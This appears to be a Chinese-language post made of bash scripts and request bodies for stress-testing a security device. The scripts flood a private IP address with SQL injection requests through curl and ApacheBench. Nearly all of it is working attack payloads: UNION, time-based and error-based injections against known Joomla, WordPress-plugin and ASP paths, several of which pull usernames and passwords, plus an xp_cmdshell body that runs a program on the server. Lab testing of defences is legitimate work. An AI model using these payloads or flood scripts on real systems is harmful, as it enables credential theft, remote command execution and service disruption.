大流量下攻击性能测试<一>
1.shell.sh:
#!/bin/bash url="http://10.50.36.172/" str1="""blocked.php?d=3&id=1025%29%20or%201%3d%28select%20IF%28conv%28mid%28%28select%20password%20from%20users%29,12,1%29,16,10%29%20%3d%2013,BENCHMARK%281038,rand%28%29%29,11%29%20LIMIT%201&file=3&u=3&history=-2""" str2="""joomla/index.php?option=com_jimtawl&view=user&task=user.edit&id=66'%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))ypeC)--%20TAql""" str3="""client-report.php%3fperiod%3d78669%26client_id%3d6%20UNiOn%20sElECt%20415,864,247,720,818,787,5%20Where%20760%2a132%3e%3d236-975%20And%20340%2a487%3e%3d81%20Or%20Not%20414%2a75%3e%3d364%2a24%20and%20nOt%20300%3c885%20ANd%20%20,nUlL--%20""" str4="""view_profile.php?user_id=-1%20union%20select%20334571500,720345993,722994539,082788274,753106239,345736683,758904763,432096245,652453484,concat%28char%28117,115,101,114,110,97,109,101,58%29,username,char%2832,112,97,115,115,119,111,114,100,58%29,password%29,748491828,843379061,951979060,876380080,731876293,483907199,430376062,406671162,138679218,192526221,259739751,768327709,022452420,965739488,440432699,505702126,672846544,667079660,386844334,510549366,087479080,212678705,846901586,910470814,996753550,922518055,040778353,556399780,771535669,352257422,372178707,540634206%20from%20admin/%2a""" str5="""index.php?view=frontend&option=com_checklist&name_search=1'%20AND%20EXTRACTVALUE(66,CONCAT(0x5c,CONCAT_WS(0x203a20,version()),(SELECT%20(ELT(66=66,1)))))--%20-""" str6="""myphpim/calendar.php3?menu=detail&cal_id=8%20unIon%20SELECt%2001,24,2,6,0,11,88,1,3,39,6,90,66,22,3,5,6/%2a""" str7="""blog/comments.asp?id=-4%20uNion%20selECT%209,USErNAme,pAsSwORD,1,24%20frOM%20LOGin%20WheRe%20ID%3d1/%2a""" str8="""penpals/profile.php?personalID=8%20uNiON%20sElecT%2001,24,2,6,0,11,88,1,3,39,6,90,pAsSwoRD,66%20FROM%20ADmin/%2a""" str9="""index.php?list[fullordering]=updatexml(0x23,concat(1,database()),1)&option=com_fields&view=fields&layout=modal""" str10="""index.php?this_day=8%27%20UNIon%20SELeCT%2001,24,2,6,0,11%27""" for((i=0;i<1;i++)) do for((j=0;j<10;j++)) do array_name=($str1 $str2 $str3 $str4 $str5 $str6 $str7 $str8 $str9 $str10) sendhttp=$url${array_name[i]} curl -g -sL -w "%{http_code} " -o error.txt --header "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" $sendhttp done done
2.testpost.sh:
#!/bin/bash url="http://10.50.36.172/" str1="""IMManager/Admin/IMAdminLDAPConfig.asp%3faction%3dedit""" str2="""pxvYKkeo/wp-content/plugins/simple-ads-manager/sam-ajax.php""" str3="""cgi-bin/serendipity/index.php?frontpage""" str4="""broadWeb/BEMS/include/chkLogin2.asp%3fuser%3d618%27%2bOR%2bIIF%28%28select%2520mid%28last%28PASSWORD%29,%22%2b618%2b%22,1%29%2520from%2520%28select%2520top%252010%2520PASSWORD%2520from%2520BAUser%29%29%3d%27%22%2bB%2b%22%27,%272%27,%271%27%29%3d%271%27%2516 """ str5="""administrator/index.php?option=com_users&layout=edit&id=53""" str6="""nagiosql/admin/helpedit.php?""" str7="""IMManager/Admin/IMAdminLDAPConfig.asp%3faction%3dedit""" str8="""admincp.php?app=article&do=batch""" str9="""jsp/FaultTemplateOptions.jsp""" str10="""ekrishta/index.php/login/sign-in""" #body sql1="/root/sql/sql1.txt" sql2="/root/sql/sql2.txt" sql3="/root/sql/sql3.txt" sql4="/root/sql/sql4.txt" sql5="/root/sql/sql5.txt" sql6="/root/sql/sql6.txt" sql7="/root/sql/sql7.txt" sql8="/root/sql/sql8.txt" sql9="/root/sql/sql9.txt" sql10="/root/sql/sql10.txt" for((i=0;i<100;i++)) do array_name=($str1 $str2 $str3 $str4 $str5 $str6 $str7 $str8 $str9 $str10) array_file=($sql1 $sql2 $sql3 $sql4 $sql5 $sql6 $sql7 $sql8 $sql9 $sql10) for((j=0;j<10;j++)) do sendhttp=$url${array_name[j]} curl -g -sL -w "%{http_code} " -o error.txt -X POST -d @"${array_file[i]}" --header "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" $sendhttp done done
3.testab.sh:
#!/bin/bash #truncate table table_name; #开始时间 begin=$(date +%s) echo "10秒后开始攻击测试" sleep 10 url="http://10.50.36.172/" str1="""blocked.php?d=3&id=1025%29%20or%201%3d%28select%20IF%28conv%28mid%28%28select%20password%20from%20users%29,12,1%29,16,10%29%20%3d%2013,BENCHMARK%281038,rand%28%29%29,11%29%20LIMIT%201&file=3&u=3&history=-2""" str2="""joomla/index.php?option=com_jimtawl&view=user&task=user.edit&id=66'%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))ypeC)--%20TAql""" str3="""client-report.php%3fperiod%3d78669%26client_id%3d6%20UNiOn%20sElECt%20415,864,247,720,818,787,5%20Where%20760%2a132%3e%3d236-975%20And%20340%2a487%3e%3d81%20Or%20Not%20414%2a75%3e%3d364%2a24%20and%20nOt%20300%3c885%20ANd%20%20,nUlL--%20""" str4="""view_profile.php?user_id=-1%20union%20select%20334571500,720345993,722994539,082788274,753106239,345736683,758904763,432096245,652453484,concat%28char%28117,115,101,114,110,97,109,101,58%29,username,char%2832,112,97,115,115,119,111,114,100,58%29,password%29,748491828,843379061,951979060,876380080,731876293,483907199,430376062,406671162,138679218,192526221,259739751,768327709,022452420,965739488,440432699,505702126,672846544,667079660,386844334,510549366,087479080,212678705,846901586,910470814,996753550,922518055,040778353,556399780,771535669,352257422,372178707,540634206%20from%20admin/%2a""" str5="""index.php?view=frontend&option=com_checklist&name_search=1'%20AND%20EXTRACTVALUE(66,CONCAT(0x5c,CONCAT_WS(0x203a20,version()),(SELECT%20(ELT(66=66,1)))))--%20-""" str6="""myphpim/calendar.php3?menu=detail&cal_id=8%20unIon%20SELECt%2001,24,2,6,0,11,88,1,3,39,6,90,66,22,3,5,6/%2a""" str7="""blog/comments.asp?id=-4%20uNion%20selECT%209,USErNAme,pAsSwORD,1,24%20frOM%20LOGin%20WheRe%20ID%3d1/%2a""" str8="""penpals/profile.php?personalID=8%20uNiON%20sElecT%2001,24,2,6,0,11,88,1,3,39,6,90,pAsSwoRD,66%20FROM%20ADmin/%2a""" str9="""index.php?list[fullordering]=updatexml(0x23,concat(1,database()),1)&option=com_fields&view=fields&layout=modal""" str10="""index.php?this_day=8%27%20UNIon%20SELeCT%2001,24,2,6,0,11%27""" function sendhttp() { #ab -n 1 -c 1 -t 10 -s 60 $1 ab -n 100 -c 100 -s 60 $1 } for((i=0;i<10;i++)) do for((j=0;j<10;j++)) do array_name=($str1 $str2 $str3 $str4 $str5 $str6 $str7 $str8 $str9 $str10) #echo ${array_name[$j]} path=$url${array_name[j]} #ab -n 1 -c 1 -t 10 -s 60 $sendhttp & sendhttp $path & done wait done #结束时间 end=$(date +%s) spend=$(expr $end - $begin) echo "花费时间为$spend秒"
4.testpostab.sh:
#!/usr/bin/bash #开始时间 begin=$(date +%s) echo "10秒后开始攻击测试" sleep 10 url="http://10.50.36.172/" str1="""IMManager/Admin/IMAdminLDAPConfig.asp%3faction%3dedit""" str2="""pxvYKkeo/wp-content/plugins/simple-ads-manager/sam-ajax.php""" str3="""cgi-bin/serendipity/index.php?frontpage""" str4="""broadWeb/BEMS/include/chkLogin2.asp%3fuser%3d618%27%2bOR%2bIIF%28%28select%2520mid%28last%28PASSWORD%29,%22%2b618%2b%22,1%29%2520from%2520%28select%2520top%252010%2520PASSWORD%2520from%2520BAUser%29%29%3d%27%22%2bB%2b%22%27,%272%27,%271%27%29%3d%271%27%2516""" str5="""administrator/index.php?option=com_users&layout=edit&id=53""" str6="""nagiosql/admin/helpedit.php?""" str7="""IMManager/Admin/IMAdminLDAPConfig.asp%3faction%3dedit""" str8="""admincp.php?app=article&do=batch""" str9="""jsp/FaultTemplateOptions.jsp""" str10="""ekrishta/index.php/login/sign-in""" sql1="/root/sql/sql1.txt" sql2="/root/sql/sql2.txt" sql3="/root/sql/sql3.txt" sql4="/root/sql/sql4.txt" sql5="/root/sql/sql5.txt" sql6="/root/sql/sql6.txt" sql7="/root/sql/sql7.txt" sql8="/root/sql/sql8.txt" sql9="/root/sql/sql9.txt" sql10="/root/sql/sql10.txt" function sendhttp() { ab -n 100 -c 100 -s 60 -T "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" -p $1 $2 } for((i=0;i<10;i++)) do for((j=0;j<10;j++)) do array_name=($str1 $str2 $str3 $str4 $str5 $str6 $str7 $str8 $str9 $str10) array_file=($sql1 $sql2 $sql3 $sql4 $sql5 $sql6 $sql7 $sql8 $sql9 $sql10) #echo ${array_name[$j]} path=$url${array_name[j]} #ab -n 1 -c 1 -t 10 -s 60 $sendhttp & sendhttp $array_file $path & done wait done #结束时间 end=$(date +%s) spend=$(expr $end - $begin) echo "花费时间为$spend秒"
5.run.sh:
#!/usr/bin/bash #开始时间 begin=$(date +%s) echo "10秒后开始进行攻击测试" #sleep 10 function sendhttp() { sh /root/sql/test.sh } #循环发送10000次攻击请求 count=1000 rsnum=200 cishu=$(expr $count / $rsnum) for ((i=0; i<$cishu;)) do for((j=0;j<rsnum;j++)) do sendhttp & done wait i=$(expr $i + 1) done #结束时间 end=$(date +%s) spend=$(expr $end - $begin) echo "花费时间为$spend秒" #sh /root/sql/test.sh & #sh /root/sql/testab.sh & #sh /root/sql/testpost.sh & #sh /root/sql/testpostab.sh & echo "攻击测试结束"
#攻击报文体:
/root/sql/
sql1.txt:
IMManager_LdapUpdate_MultiValueDelimiter=%7c&hdnLDAPchangePass=1&IMManager_LdapUpdate_ServeID=-1&IMManager_LdapUpdate_UseSecureFlag=0&IMManager_LdapUpdate_GroupQuery=%28%26%28objectCategory%3dgroup%29%28objectClass%3dgroup%29%29&IMManager_LdapUpdate_ServerName=im_server&IMManager_LdapUpdate_Port=edu%27,N%27CN%3dMOIkmpVDoeBjL%27%20,N%274MgVtJPZRF0c53%27%20,389%20,636%20,0,N%27OU%3dSales%27%20,N%27%28%26%28objectCategory%3dperson%29%28objectClass%3duser%29%29%27%20,N%27%28%26%28objectCategory%3dgroup%29%28objectClass%3dgroup%29%29%27,N%27,User,%20Person,OrganizationalPerson,Top,MSExchIMRecipient,MSExch%20CustomAttributes,DominoPerson,%27%20,N%27%7c%27%29%3bexec%20master.dbo.xp_cmdshell%20%26%23x22%3b%20C:%5cwindows%5csystem32%5ccmd.exe%20/c%20c:%5cwindows%5csystem32%5ccalc.exe%26%23x22%3b%20--%27&IMManager_LdapUpdate_UserQuery=%28%26%28objectCategory%3dperson%29%28objectClass%3duser%29%29&IMManager_LdapUpdate_SearchBaseDN=OU%3dSales,DC%3d8hmgNHVp1ARgWKmEia,DC%3dhtqaWVKiVwdT,DC%3dedu%22&IMManager_LdapUpdate_Secure_Port=636&hdn_IMManager_LdapUpdate_ObjectClasses=User&IMManager_LdapUpdate_UserDN=CN%3dMOIkmpVDoeBjL,CN%3dUsers,DC%3d8hmgNHVp1ARgWKmEia,DC%3dhtqaWVKiVwdT,DC%3dedu&IMManager_LdapUpdate_Password=4MgVtJPZRF0c53
sql2.txt:
hits[2][]=2942&action=sam_hits&hits[0][]=5411&hits[1][]=' unioN seleCt 46,611,917,745,364 WhERE 551=588 aND 565>=201-374 Or nOT 905+116<>948 or /*&level=3